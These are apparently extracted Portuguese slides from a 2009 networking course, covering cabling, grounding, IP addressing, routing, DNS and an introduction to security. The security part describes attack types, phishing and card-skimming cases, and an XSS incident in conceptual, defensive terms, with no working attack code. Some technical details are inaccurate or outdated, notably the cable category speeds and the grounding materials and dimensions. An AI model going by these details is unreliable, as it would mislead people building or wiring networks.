Você está na página 1de 315

REDES AVANADAS

Eudes Danilo
12/09/2009
Mendona
eudesdanilo@gmail.co
mhttp://www.4shared.com/file/59507480/8e48421c/

SENAI_-_CURSO_AVANCADO_REDES.html

Pr-requisitos:

Conhecimentos bsicos em redes

Apresentao
Quem sou eu?
Quem so vocs?
O que esperam da matria?
Quais as experincias em Redes?
Conhecimentos em Windows Server e/ou

Linux?
2

Sinopse:

I - Reviso dos Conhecimentos Bsicos de Redes: Conceitos de Redes, equipamentos, perifricos e conexo da rede

II - Noes de Cabeamento Estruturado: Conhecimento de Asbuilt, certificao de uma rede, elaborao de um


anteprojeto de rede, elaborao de um projeto de redes.

III - Noo de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, subnet de rede,
roteamento de rede

IV - Redes Ponto-a-Ponto Projeto;


V - Segurana de Rede: Noes de segurana fsica e lgica, objetivos, introduo a ataques, vulnerabilidade, como
previnir ataques
VI - Windows 2003 Server: Instalao, configurao de servios (DHCP, DNS, WINS, IIS, FTP), servidor de arquivos,
servidor de Impresso, Active Direct, Segurana em nvel de recursos - Permisses de arquivos, Backup e
Recuperao, Logs e Servios, Monitoramento fsico e lgico da rede
VII Linux: Instalao, configurao de servios (DHCP, FTP, APACHE, SSH), Segurana em nvel de Recursos Permisses de arquivos, Backup e Recuperao, Logs, Servios, acessos apartir de estaes Windows e
Transmisso de arquivos entre windows e linux

VIII - Ambiente Misto: Integrao de servios (WEB, FTP, BACKUP) entre a plataforma Windows 2003 e Linux com os
clientes Windows XP

Plano de Aula:

Utilizao de Notebook e datashow e prtica nos


desktops de vocs;

Avaliao:
Sero avaliaes Mensais:

Materiais do curso e outros do autor

Senai
Apostila
http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI_-_TURMA_AVANCADA.html

Redes Avanadas Power Point


http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html

Redes Bsicas Power Point


http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html

Esamaz
Segurana de Sistemas
http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html

Firewall
http://www.4shared.com/file/40014575/5e5292cb/Firewall.html

Script Linux
http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html

Vrus
http://www.4shared.com/file /42802741/12513457/virus.html

Criptografia
http://www.4shared.com/file/43349581/53517583/Criptografia.html
Segurana de Redes
http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html

Dvidas ??

I Reviso dos Conhecimentos


Bsico de Redes

O que Redes de
computadores?
Possibilitar o compartilhamento de informaes (programas e dados) armazenadas nos
computadores da rede;

Permitir o compartilhamento de recursos associados s mquinas interligadas;

Permitir a troca de informaes entre os computadores interligados;

Permitir a troca de informaes entre usurios dos computadores interligados;

Possibilitar a utilizao de computadores localizados remotamente;

Permitir o gerenciamento centralizado de recursos e dados;

Melhorar a segurana de dados e recursos compartilhados

Porque ligar micros em rede?


Palavra chave

Compartilhamento.

Tipos de Redes
Ponto x Ponto

Usada em redes pequenas (normalmente at 10 micros);


Baixo Custo;
Fcil implementao;
Baixa segurana;
Sistema simples de cabeamento;
Micros funcionam normalmente sem estarem conectados
a rede;\
Micros instalados em um mesmo ambiente de trabalho;
No existe um administrador de rede;
No existe micros servidores;
A rede ter problemas para crescer de tamanho.

10

Cliente x Servidor
Deseja ter uma maior segurana na rede. (Nesse

tipo de rede aparece uma figura denominada


servidor. O servidor um computador que oferece
recursos especializados, para os demais micros da
rede, ao contrrio do que acontece com a rede
ponto-a-ponto onde os computadores compartilham
arquivos entre si e tambm podem estar fazendo
um outro processamento em conjunto).
Outra vantagem das redes cliente/servidor a
forma centralizada de administrao e
configurao, o que melhora a segurana e
organizao da rede.

11

Tipos de Servidores

Servidor de Arquivos: um servidor responsvel pelo armazenamento


de arquivos de dados como arquivos de texto, planilhas eletrnicas, etc...
importante saber que esse servidor s responsvel por entregar os
dados ao usurio solicitante (cliente), nenhum processamento ocorre nesse
servidor, os programas responsveis pelo processamento dos dados dos
arquivos deve estar instalados nos computadores clientes.
Servidor de Impresso: um servidor responsvel por processar os
pedidos de impresso solicitados pelos micros da rede e envi-los para as
impressoras disponveis. Fica a cargo do servidor fazer o gerenciamento
das impresses.
Servidor de Aplicaes: responsvel por executar aplicaes do tipo
cliente/servidor como, por exemplo, um banco de dados. Ao contrrio do
servidor de arquivos, esse tipo de servidor faz processamento de
informaes.
Servidor de Correio Eletrnico: Responsvel pelo processamento e pela
entrega de mensagens eletrnicas. Se for um e-mail destinado a uma
pessoa fora da rede, este dever ser passado ao servidor de comunicao
(firewall)
Servidor de Comunicao (Firewall): Usado para comunicao da sua
rede com outras redes, como a Internete Se voc acessa a Internet atravs
de uma linha telefnica convencional, o servidor de comunicao pode ser
um computador com uma placa de modem ou conexes com ADSL ou
LPCD.

12

Vantagens e Desvantagem do Cliente x


Servidor
Custo Maior desempenho do que as redes ponto-a-ponto;

Implementao necessita de especialistas;


Melhor desempenho que as redes ponto-a-ponto;
Alta segurana;
Configurao e manuteno na rede feita de forma centralizada;
Existncia de servidores, que so micros capazes de oferecer
recursos aos demais micros da rede

13

II - Noes de Cabeamento
Estruturado

14

Cabeamento Estruturado
Conector RJ45 Macho

15

Cabeamento Estruturado
Cabo UTP

UTP Color Codes

Par
Par
Par
Par

1
2
3
4

Branco-Azul (BA) / Azul (A)


Branco-Laranja (BL) / Laranja (L)
Branco-Verde (BV) / Verde (V)
Branco-Marrom (BM) / Marrom (M)

16

Cabeamento Estruturado
Cabo UTP / CATEGORIAS
Categoria 1 cabo de par tranado tradicional, que o utilizado para telefonia

(instalado antes de 1983). No recomendado para utilizao em redes locais.


Categoria 2 cabo certificado para transmisso de dados (possui 4 pares
tranados). Sua utilizao em redes tambm no recomendvel.
Categoria 3 esta categoria suporta 10 Mbit/sec numa rede Ethernet, 4Mbit/s
em uma Token Ring. Este cabo permite que at quatro telefones normais ou dois
multilinhas sejam conectados ao equipamento da companhia telefnica.
Categoria 4 esta categoria suporta taxas de transmisso de at 16 Mbit/s em
uma rede Token Ring. Este cabo possui quatro pares.
Categoria 5 possui 4 pares tranados com oito tores. Suporta taxas de
transmisso de 100 Mbit/s. Sua utilizao adequada para redes Fast Ethernet e
redes ATM. No incio dos anos 90, 60% dos edifcios possuam este tipo de cabo
(EUA).
Categoria 6 tambm possui 4 pares tranados. Suporta taxas de transmisso
de at 155 Mbit/s. Sua utilizao adequada a redes Fast Ethernet para
transmisso de dados e voz.

17

Cabeamento Estruturado
Crimpador

Testador

18

Cabeamento Estruturado
Delay
um dos itens mais importantes, pois a estruturao
fsica pode influenciar na performance e velocidade da
rede. ideal que tenha o menor nmero de segmentao
e quando ocorrer a segmentao que seja centralizado os
servidores, pontos de sada da rede e principais clientes
no switch principal.

19

Cabeamento Estruturado
Processo da Crimpagem

Normal -

Padronizao EIA/TIA 568 Conhecida


como seqncia de crimpagem de normal. Utilizada
para conexo de um microcomputador a um HUB ou
SWITCH.
EIA/TIA-568
1. Branco-Verde
2. Verde
3. Branco-Laranja
4. Azul
5. Branco-Azul
6. Laranja
7. Branco-Marrom
8. Marrom

20

Cabeamento Estruturado
Crossover

- Um cabo crossover consiste na


interligao de 2 (dois) computadores pelas respectivas
placas de rede sem ser necessrio a utilizao de um
concentrador (Hub ou Switch) ou a ligao de modems a
CABO com a maquina cliente com conectores do tipo RJ45. A
alterao dos padres das pinagens dos cabos torna possvel
a configurao de cabo crossover ou cabo direto. A ligao
feita com um cabo de par tranado (na maioria das vezes)
onde se tem: em uma ponta o padro T568A, e, em outra o
padro T568B (utilizado tambm com modems ADSL).

1 ponta do
cabo
branco verde
verde
branco laranja
azul
branco azul
laranja
branco
marrom

2 ponta do
cabo
branco laranja
laranja
branco verde
azul
branco azul
verde
branco
marrom

21

Cabeamento Estruturado
1 Prtica: Processo da

Crimpagem

22

Cabo Normal

23

Cabo Crowwover

24

Cabeamento Estruturado
Certo

Errado

25

Cabeamento Estruturado
O que no pode ocorrer

26

Cabeamento Estruturado
O que no pode ocorrer

27

Cabeamento Estruturado

28

Cabeamento Estruturado

29

Cabeamento Estruturado

30

Cabeamento Estruturado
2 Prtica: Processo da Crimpagem

31

Cabeamento Estruturado

32

Cabeamento Estruturado

33

Cabeamento Estruturado

34

Cabeamento Estruturado

35

Cabeamento Estruturado

36

Sugesto para a Rede Eltrica


Ideal ter a cada circuito de 10 A

at 3 tomadas;
No permitir que sejam ligados
outros equipamentos como:
Copiadoras, ventiladores, motores
eltricos, ou qualquer outro que
exija ou produza rudo na linha.

37

Sugesto para a Rede Eltrica

38

Sugesto para a Rede Eltrica


As tomadas devem ser do tipo universal de

trs pinos (tripolares) e a ligao


fase/neutro/terra

As tenses aproximadas na rede eltrica devero ser as seguintes:

Entre terra e fase = 117 V


Entre neutro e fase = 115 V
Entre terra e neutro = 2,5 V(valor Maximo tolerado)

39

Sugesto para a Rede Eltrica

40

Aterramento
O terra dos equipamentos de informtica DEVE ser

totalmente independente dos demais terras


existentes.
Observando o seguinte na instalao:
Ser construdo distncia mnima de 2,40m dos outros
terras do quadro e do neutro e a uma distncia
mnima de 25,00 do terra de pra-raios.
O cabo que liga as barras de aterramento ao quadro
deve ser encapado, possuir bitola compatvel com a
distancia entre o sistema e o quadro, e NO DEVER
ESTAR NUNCA CONECTADO AO NEUTRO.No so
aconselhveis distncias maiores que 50m entre o
terra e o quadro de distribuio.

41

Aterramento
Material necessrio para um aterramento simples:

- 3 barras de cobre, com 2 a 3 metros de comprimento e


15cm de dimetro.
- 6 abraadeiras de bronze para as barras de cobre.
- 10 metros de fio isolado, de bitola idntica dos fios fase e
neutro.
- Sal grosso, carvo vegetal e enxofre em quantidades
suficientes para cobrir o poo dos eletrodos.
- gua destilada suficiente para regar a mistura.
- As barras de cobre so chamadas eletrodos de aterramento;
do uma referncia de terra de 0 volte uma conexo terra
para descargas eltricas atmosfricas. Tambm fornecem
uma trajetria de impedncia baixa terra ( valor mximo
de 25 ohms).
42

Aterramento

43

Aterramento
Consequncias da falta de aterramento:

- Apario de BAD CLUSTERS no HD ou at


mesmo a perda total. Isto no demora a
acontecer.
- Voc poder perder seu HD em 2 ou 3 meses.
- Danos na placa me.
- Danos na memria, que podem vir a causar
perda repentina de dados e ou congelamento
de todo o sistema.

44

DOCUMENTAR UMA REDE


Fsicamente:
- Asbuilt
Lgicamente:
- Software Inventrio;
(http://www.softwarepublico.gov.br/spb/ver-comunidade?
community_id=3585)

- Help Desk; (http://ocomonphp.sourceforge.net/)


- Analyzer Network; (Network supervisor 3COM)
- Logs

(Firewall, event view, /var/log/messages)

45

Criao de AnteProjeto de Rede


Veja quando falamos em projeto, no

queremos e no vamos formar


engenheiros aqui, nossa inteno e
mostrar que uma documentao bem
feita pode ser o diferencial dentro desta
rea , o projeto pode ser escrito, no
necessariamente um desenho, lgico que
se possuir o desenho muito melhor,
mesmo porque hoje existem ferramentas
para auxiliar neste propsito.

46

Criao de AnteProjeto de Rede

47

Elaborao de um Projeto de Rede


Informaes repassada pelo empresa:
- 1 Caso: Rede 100 % cabeada;
- 2 Caso: Rede Mista
Criao da Documentao do Projeto:
- Criano do Site Survey;
- Criao do anteprojeto;
- Entrega do Asbuilt pela empresa

prestadora do servio;
48

Criao dos Site Survey 1 Caso

49

Criao dos Site Survey 2 Caso

50

Viso Macro

Exerccio: Criao de
anteprojeto
Informaes repassada pelo empresa (Site
Survey):
-

As paredes externas so de cermico aparente e as paredes


internas, incluindo as salas laterais , de reboco liso e pintado;
O teto de forro falso e o piso de granito natural;
O departamento de telemarketing possui divisrias baixas
acsticas em formas de baias, de madeira, revestida com
espuma de poliuretano e tecido grosso;
Toda iluminao feita com luminrias com 4 lmpadas
fluorescentes de 40 W x 220 V e localizada no centro geomtrico
de cada ambiente;
Altura entre o forro e o piso de 2,6m;
A sala de treinamento, recebe freqentemente pessoas no ligadas
a empresa, alm disso seu layout constantemente alterado;

52

Exerccio: Criao de
anteprojeto

53

III Noes de Protocolo de


rede

54

Protocolos - Definio

56

A Mensagem em Camadas
Remetente
Mensagem
Escrita

-Voc tem uma idia e


deseja comunica-la a
outra pessoa
-Tem de escolher a forma
de expressar essa idia

Destinatrio
Mensagem
Escrita

Envelope

-Voc decide como de


uma forma apropriada

Envelope

Agncia

-Enfim, de fato expe sua


idia
Rodovia/Malote

Agncia

Protocolo TCP/IP

O que configurar ?
IP
MASCARA
GATEWAY
DNS

59

Onde, o que e por que


Configurar

IP e MASCARA

61

Endereos IP

Endereo IP: Indentificador de Rede + Indentificador de HOS

Endereo IP de 32 bits

Identificador da
rede

host

Identificador do
host

REDE

REDE
internet

hosts com
identificadores
de rede
distintos.

hosts com o
mesmo
identificador de
rede.
REDE

REDE

62

Como atribuir IPs para rede


abaixo?
SO PAULO

...
230 computadores

CURITIBA

...
200 computadores

63

endereo classe C
MSCARA: 255.255.255.0
identificador de rede

200.0.0.3

200.0.0.2

identificador do host

200.0.0.4

200.0.0.5

200.0.1.4

200.0.1.5

200.0.0.1
roteador
200.0.1.1

200.0.1.2

200.0.1.3

O roteador possui dois endereos IP, um para cada rede.

64

Como Atribuir IPs para rede abaixo?


SO PAULO

...

CURITIBA

...

400 computadores

RIO DE JANEIRO

600 computadores

...
500 computadores
65

Solucionar Principais Problemas


Usando o Utilitrio IPConfig
O utilitrio IPConfig muito til para determinar se as
configuraes de rede atuais so desejadas. Vrios
erros podem ser detectados atravs deste utilitrio.
Execute-o atravs de um Prompt de Comando (clique
em Start -> Run e digite CMD), digitando ipconfig /all e
teclando Enter.

Solucionar Principais Problemas

Conflito de IP: Ocorre quando um IP manual atribudo mquina


e j existe outro computador na rede com o mesmo IP. Nesse
caso, a tela do Ipconfig deve se parecer com a seguinte:

Note que os campos IP e Mscara de Subrede esto zerados. Essa


a principal caracterstica de um conflito de IPs.
- Configurao incompleta: Certifique-se de que os campos DNS
Servers e Default Gateway no esto em branco.

Solucionar Principais Problemas

Note que, como no h servidor DNS e nem Default Gateway

configurados, o computador somente poder enviar e recebe


dados dentro da rede local e com outros computadores

Solucionar Principais Problema


Usando o Utilitrio PING
Ela se refere ao utilitrio do TCP/IP denominado "Ping", que
tem como funo testar se um host est ativo, enviando um
pacote de dados para esse host e pedindo uma reposta caso
ele esteja online e funcionando corretamente. Ento, "pingar"
o endereo de loopback simplesmente testa se sua mquina
inicializou o TCP/IP corretamente. Para fazer isso, entre em um
Prompt de Comando e digite: ping 127.0.0.1 e tecle Enter.
Voc tambm poder pingar no IP da placa assim como de
qualquer mquina da rede, assim como por nome
dependendo de alguns servios. Vale ser ressalta que o ping
pode ser desabilitado.

Solucionar Principais Problema


Usando o Utilitrio NETSTAT e TELNET
NETSTAT verifica os servios que localmente a mquina/host
est provendo

TELNET: Tem como funo testar se o servio est ativo. Para fazer
isso, entre em um Prompt de Comando e digite: telnet IP
PORTA_SERVICO. Este Teste serve tanto se voc local ou remoto
da mquina que est provendo o servio.

GATEWAY

71

Roteamento Indireto
Origem e Destino esto em redes

diferentes
Tabela de Roteamento
10.35.143.10

Destino
10.35.143.0
0.0.0.0

Gateway
DIRETO
10.35.143.1

10.35.143.1

Router
REDE
10.35.143.0

10.35.144.15

10.35.144.1

Tabela de Roteamento
Destino
10.35.143.0
10.35.144.0
.......

REDE
10.35.144.0

Gateway
10.35.143.1
10.35.144.1
.......

Tabela de Roteamento
Destino
10.35.144.0
0.0.0.0

Gateway
DIRETO
10.35.144.1

Exemplo de roteamento
Exemplo de uma rede Intranet constituda de duas
redes fsicas conectadas por um roteador.

192.168.0.1

192.168.0.2

192.168.0.5

192.168.0.3

192.168.0.4

rede 192.168.0.x
roteador
interno

192.168.1.5
rede 192.168.1.x

192.168.1.1

192.168.1.2

192.168.1.3

rede interna de uma empresa.

servidor

192.168.1.4

Tabelas de Roteamento

Exemplo de Tabela de Roteamento


TABELA DO ROTEADOR 1:
Rede
Gateway
200.134.51.0 (255.255.255.0) 200.134.51.1
200.17.98.0 (255.255.255.0) 200.17.98.23
0.0.0.0 (0.0.0.0)
200.130.0.2

Interface
200.134.51.1
200.17.98.23
200.130.0.1

200.17.98.23

INTERNET
REDE 200.17.98.X
roteador
1

roteador
2

200.134.51.1

REDE 200.134.51.X

200.130.0.1

200.130.0.2
75

Exerccio 1
Construa a tabela de roteamento do

Roteador 1
200.0.0.1
INTERNET

200.0.0.2
200.134.51.0

255.255.255.0

1
200.17.98.1

200.134.51.1

2
200.17.98.0
255.255.255.0

INTERNET

200.17.98.23
76

TABELA DE ROTEAMENTO
Rede Destino

Mascara

Gateway

Interface

Custo

77

TABELA DE ROTEAMENTO
Rede Destino
200.134.51.0
200.17.98.0
0.0.0.0
0.0.0.0

Mascara

Gateway

Interface

255.255.255.0

200.134.51.1

200.134.51.1

255.255.255.0

200.17.98.1

200.17.98.1

0.0.0.0
0.0.0.0

200.0.0.1

200.0.0.2

200.17.98.23

200.17.98.1

Custo
1
1
1
2

Exerccio 2:

Utilizando a classe C: 200.0.0.0 (255.255.255.0)


A) distribua os IPs nas duas redes abaixo
B) defina a tabela de roteamento do roteador 1.

1
100
computadores

INTERNET

100
computadores
79

DNS

80

DNS - Domain Name Service


Padro Aberto para Resoluo de

Nomes Hierrquicos

Agrupa nomes em domnios.


A rvore de nomes armazenada num
banco de dados distribudo.
distribudo

Especificaes do DNS
RFCs 1033, 1034, 1034, 1101, 1123,
1183 e 1536.
Expecificaes da Internet Task Force

Berkeley Internet Name Domain (BIND)


Implementao desenvolvida na Berkley
University para a verso 4.3 SD Unix

Demonstraes: Servios de Nomes


A funo principal dos servios de nomes
traduzir nomes de domnio para os seus
respectivos endereos IPs.
Servidor DNS
www.cade.com
= 35.35.2.80
www.oi.com = 10.10.10.1

www.cade.com
www.oi.com
www.av.com=50.75.96.8
www.ufg.br
= 20.20.20.80

www.ufg.br
www.av.com

IV Redes Ponto a Ponto

83

Elaborao de Projeto

84

Elaborao de Projeto
Criar uma formulrio / checklist de

informaes que devero que


sero coletadas junto a conversa
inicial.
Qual a finalidade ?
Quem vai acessar (de onde, como, que soluo) ?
Quantos computadores ?
De onde vai ser o acesso ?
Qos?
Local Fsico (disponibilidade para cabeamento)
85

Elaborar uma proposta /


Itens informados:
Soluo.
- 2 casas (distante 500 mts) sendo que uma
-

tombada pelo patrimnio histrico;


Acesso de usurio em uma rede local e clientes
via Web (internet);
Acesso de funcionrios a pastas especficas de
arquivos, assim como acesso ao sistema
corporativo;
500 computares (300 comp. Em uma casa e 200
em outra);
No posso para meu acesso nem por 1 minuto

86

Ilustrao do funcionamento do
TCP/IP
Vdeo Guerreiros da Internet

V - Segurana de Redes

88

O sistema informtico mais


seguro no utilizvel
O sistema informtico mais
utilizvel inseguro
S existe um computador 100%
seguro, o desligado.

89

Introduo
A Segurana da Informao pode ser

definida como a proteo de dados


contra a revelao acidental ou
intencional a pessoas no autorizadas,
e contra alteraes no permitidas.

A segurana no universo computacional

divide-se em:

Segurana Fsica
Segurana Lgica

90

Introduo (cont.)
Objetivo da Segurana Informtica
Seja qual for a dimenso de um
sistema informtico, deve procurar-se
atingir, na sua explorao, os
seguintes objetivos:
Integridade do equipamento
Confidencialidade e a qualidade da
informao
Prontido do sistema (eficincia x
eficcia)
91

O que voc est tentando


proteger?
Seus dados

Integridade
Privacidade
Disponibilidade
Seus recursos
Sua reputao

92

Contra o que voc est tentando


proteger?
se
Roubo de senhas
Engenharia Social
BUG & Backdoors
Falha de autenticao
Falha de protocolo
Obtendo Informaes
Negando servios (DoS)
93

Objetivos da Segurana
O objetivo da segurana da informao

abrange desde uma fechadura na porta


da sala de computadores at o uso de
tcnicas criptogrficas sofisticadas e
cdigos de autorizao.
O estudo no abrange somente o crime
computacional (hackers), envolve
qualquer tipo de violao da
segurana, como erros em
processamento ou cdigos de
programao.
94

Objetivos da Segurana
Segurana no uma
tecnologia
Quem?

O que?
Quando?
Como?
Onde?
Porque?

Objetivos da Segurana
A segurana de dados tem por

objetivo restringir o uso de


informaes (softwares e
dados armazenados) no
computador e dispositivos de
armazenamento associados a
indivduos selecionados.

96

Os objetivos da Segurana da
Informao so:

Preservao do patrimnio da empresa

(os dados e as informaes fazem


parte do patrimnio).
Deve-se preserv-lo protegendo-o contra
revelaes acidentais, erros operacionais e
contra as infiltraes que podem ser de
dois tipos:
Ataques passivos (interceptao)
Ataques ativos (interrupo, modificao
e Fabricao)

97

Ataques passivos
Ataques
AtaquesPassivos
Passivos
Intercepo

Anlise do
contedo das
mensagens

Anlise do trfego

O objetivo obter informao que est a ser transmitida.


Este tipo de ataques muito difcil de detectar. O esforo de
proteco deve ser no sentido da preveno.

Ataques Passivos
Anlise do contedo das mensagens Escutar

e entender as informaes.

Anlise do trfego O oponente pode

determinar a origem e identidade das


comunicaes e pode observar a frequncia e
comprimento das mesmas. Esta informao
pode ser til para determinar a natureza da
comunicao. Os ataques passivos so
muito difceis de detectar porque no
envolvem nenhuma alterao de dados. A
nfase ou o esforo deve desenvolvido no
sentido da preveno e no da deteco.

Intercepo
Emissor

Receptor

Intercepo

Intercepo Quando utilizadores no autorizados


conseguem aceder a recursos para os quais no estavam
autorizados. um ataque confidencialidade. A parte no
autorizada pode ser uma pessoa, um programa ou um
computador. Exemplos: violao de cabos de comunicao,
para capturar dados da rede, cpia ilcita de pastas e
programas, etc.

Ataques Ativos
Ataques
AtaquesAtivos
Ativos

Interrupo
(Disponibilidade)

Modificao
(Integridade)

Fabricao
(Autenticidade)

Envolvem alguma modificao de dados.


Este tipo de ataques muito difcil de prever, j que,

para isso, seria necessrio uma proteo completa de


todos os tipos de comunicaes e de canais. Por esta
razo, o esforo de proteco deve ser no sentido de os
detectar e recuperar dos atrasos ou estragos entretanto
causados.

Interrupo
Emissor

Receptor

Interrupo

Interrupo A informao de um sistema torna-se


indisponvel ou destruda. um ataque disponibilidade.
Exemplos: Destruio de peas de Hardware, o corte de linhas de
comunicao, a inoperncia do sistema de ficheiros, etc.

Modificao
Emissor

Receptor

Modificao

Modificao uma parte no autorizada, no s acede


informao, mas tambm a modifica. um ataque de integridade.
Exemplos: alterao de valores num ficheiro de dados; alterao
de um programa para que ele funcione de maneira diferente ou
modificao do contedo de mensagens transmitidas pela rede.

Fabricao

Emissor

Receptor

Fabricao

Fabricao uma parte no autorizada insere dados


falsos no sistema. um ataque autenticidade.
Exemplos: insero de mensagens simuladas na
rede ou a adio de registos a um ficheiro.

O que ataque?
Ataque toda ao realizada
com intuito ou no de causar
danos.

105

Vulnerabilidades
Todo computador vulnervel a

ataques. (Possui informao)


Tipos de Vulnerabilidades

Vulnerabilidades
Vulnerabilidades
Vulnerabilidades
Vulnerabilidades
Vulnerabilidades
Vulnerabilidades
Vulnerabilidades

Fsicas (Meio, Construo)


Naturais (Desastres Naturais)
de Hardware e Software(Falhas)
de Media (Roubos de Media)
de Comunicao (Hacker)
de Humanos (Usurios)
sobre Exploit (Brechas, Copias)

Um ataque tpico

107

Anatomia de um ataque
Varredura

Reconhecimento

Enumerao

Invaso

Negao de
Servios

Escalando
privilgios

Acesso
informao

Instalao de
back doors

Ocultao
de rastros

109

110

O que um hacker ataca ?


Aplicaes
Banco de dados
Sistemas operacional
Servios de rede

Tipos de ataques conhecidos


Escutas

Packet Sniffing escuta e inspeciona cada pacote da rede


IP/Session Hijacking interceptao da seo pelo invasor
Senha
Uso de dicionrio de senhas
Fora bruta tentativa e erro
Outros ataques
Alterao de site (web defacement)
Engenharia social
Ataque fsico s instalaes da empresa
Uso de cavalos de tria e cdigos maliciosos
Trashing revirar lixo em busca de informaes
War dialing liga para vrios nmeros de telefone para
identificar os que tem modem instalado

112

Motivao para o Ataque


Por qu existem as invases aos sistemas?

Orgulho
Exibicionismo/fama
Busca de novos desafios
Curiosidade
Protesto
Roubo de informaes
Dinheiro
Uso de recursos adicionais
Vantagem competitiva
Vingana
113

Exemplo: Oliberal 10/02/08

114

Caso Real

Atualmente 70% das quebras de


segurana corporativas so geradas
internamente.

Caso Real

Perfil do Fraudador*:
68% esto na Mdia e Alta Gerncias
80% tem curso superior completo
Predominantemente do Sexo Masculino
Idade mdia entre 31 e 40 anos
*Pesquisa sobre crimes econmicos - PWC 05

Tipos de ataques conhecidos


Negao de servios

Syn Flood inundar a fila de SYN para negar novas conexes


Buffer overflow colocar mais informaes do que cabe no buffer
Distributed DoS (DDoS) ataque em massa de negao de servios
Ping of Death envio de pacote com mais de 65507 bytes
Smurf envio de pacote ICMP em broadcast a partir de uma
mquina, sendo inundada com as respostas recebidas
CGI exploit
Land, syn flooding, ...
Simulao
IP Spoofing uso do IP de uma mquina para acessar outra
DNS Spoofing assumir o DNS de outro sistema
Investigao
Port scanning varredura de portas para tentar se conectar e invadir
Spam
Acesso a um grande nmero de pessoas, via email, com link para
sites clonados que pedem informaes pessoais

117

Ex: Email para roubo de informaes

118

Ex: Email para roubo de informaes

119

Ex: Email para roubo de informaes

120

Ex: Email para roubo de informaes

121

Ex: Email para roubo de informaes

122

Ex: Email para roubo de informaes

123

Ex: Email para roubo de informaes

124

Ex2: Clonagem de carto de banco


Bocal
preparado

125

Ex2: Clonagem de carto de banco


Imperceptv
el para o
cliente

126

Ex2: Clonagem de carto de banco


Micro
cmera
disfarada
de porta
panfleto

Ex2: Clonagem de carto de banco


Viso
completa da
tela e teclas
digitadas

128

Ex2: Clonagem de carto de banco


Viso
completa da
tela e teclas
digitadas

129

Ex2: Clonagem de carto de banco


Micro
cmera
Bateria
Antena
transmissora

130

Ex3: Email de promoo (roubo


informao)

131

Ex3: Email de promoo (roubo


informao)

132

Ex4: Antivirus Gratis

133

Ex5: Engenharia Social


Ao atender um telefonema, o interlocutor se

identifica como vice-diretor da empresa. Voc j


o viu pelos corredores, mas nunca falou com ele
por telefone. Ele informa que se encontra na filial
da empresa, em reunio, e est com problemas
para acessar o sistema. Assim sendo, solicita a
senha para que possa ter acesso. Informa,
ainda, que est acompanhado de 10 pessoas
que possuem outros compromissos e que no
podem esperar por muito tempo.

134

Ex6: Email Receita Federal

135

Cpia de identidade visual de rgos


pblicos
Pedido de
download de
arquivos /
erros de
portugus

Cpia de identidade visual de


entidades populares

Histria
estranha e
mal contada

Necessidade
urgente de
download

Servio inexistente

Pedido de download de arquivos

Ameaas

Uso de marca popular

Pedido de
download de
arquivo

Distrbuio
muito vantajosa
de prmios

Uso de marca popular

Erro de portugus

Dvida inexistente

Falta de meno a endereo


por extenso

Erro de portugus

Falha no site do Bradesco permitiu


ataque XSS

(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisaCriminosos brasileiros conseguiram descobrir um problema em uma


inst-xss/)
pgina do Bradesco que permitia que a mesma fosse alterada por meio
de links, possibilitando o uso do domnio do banco para todo tipo de
atividade maliciosa.
Para tal, crackers enviaram e-mail em massa contendo um link que
explorava uma falha de XSS (Cross Site Scripting) existente em uma
pgina localizada em institucional.bradesco.com.br. Se clicado, o link
enviava informaes pgina que causavam um comportamento
indesejvel, fazendo com que argumentos da query string como
chamada a parte do link depois do ponto de interrogao (asp?)
fossem inseridas como cdigo, permitindo o ataque.
Dias antes da publicao desta matria, a Linha Defensiva notificou o
Bradesco. O banco removeu a pgina vulnervel dentro de
aproximadamente 48 horas, inutilizando o ataque.
A mensagem contendo o link que explorava a brecha solicitava o
recadastramento das chaves de segurana usadas nas transaes atravs
da Internet, convidando o usurio a faz-lo por meio do link.

142

Falha no site do Bradesco permitiu ataque


XSS (http://linhadefensiva.uol.com.br/2008/07/bradescopesquisa-inst-xss/)

Como demonstrado na imagem, a maioria dos navegadores e os programas


de e-mails no exibem o endereo completo de uma URL, se esta for muito
extensa, no permitindo que a existncia do golpe seja percebida.
Embora o e-mail tenha usado uma tcnica refinada que facilmente poderia
enganar at mesmo usurios com certa experincia, devido ao link camuflado,
erros de ortografia caractersticos de golpes e fraudes se faziam presentes.
Aparentemente, o sistema de e-mail em massa usado pelos criminosos no era
compatvel com caracteres especiais, como acentos.

143

Falha no site do Bradesco permitiu


ataque XSS

(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisaXSS
Cross Site Scripting, ou XSS, um tipo de vulnerabilidade onde determinada pgina de internet no filtra
inst-xss/)

suficientemente as informaes enviadas pelo navegador web, sendo possvel faz-la exibir contedos de
outros sites, ou contedos especificados no prprio link ou outra informao.
Um exemplo clssico a pgina de busca. Em geral, pginas de buscas exibem na tela a informao que
est sendo procurada (por exemplo, Voc est procurando por: [termo de pesquisa]). Se a exibio desta
informao no for filtrada corretamente, a informao, em vez de exibida, ser interpretada como cdigo
HTML pelo navegador, possibilitando o ataque.
Fruns, livros de visitas e blogs (este ltimo, devido funo de comentrios) podem ser vtimas do XSS
permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetar qualquer usurio
que o ver. Este o ataque de XSS persistente, ou tipo 2.
O Bradesco foi alvo do XSS impermanente ou no-persistente, tambm chamado de XSS tipo 1.
O objetivo de ataques XSS geralmente roubar informaes importantes da vtima, tais como os cookies
de autenticao. Porm, XSS tambm pode ser usado para alterar os sites e usar da confiana depositada
pelo internauta na pgina para persuadi-lo a enviar informaes sigilosas, ou para rodar cdigo malicioso
nos PCs de visitantes.
A Linha Defensiva j noticiou a respeito de brechas semelhantes no YouTube e no Orkut.
Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de email e similares no sejam clicados, a no ser quando estava-se esperando absolutamente o e-mail em
questo (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que
possvel, deve-se digitar o endereo do site na barra de endereos do navegador e procurar manualmente o
que foi indicado no e-mail.
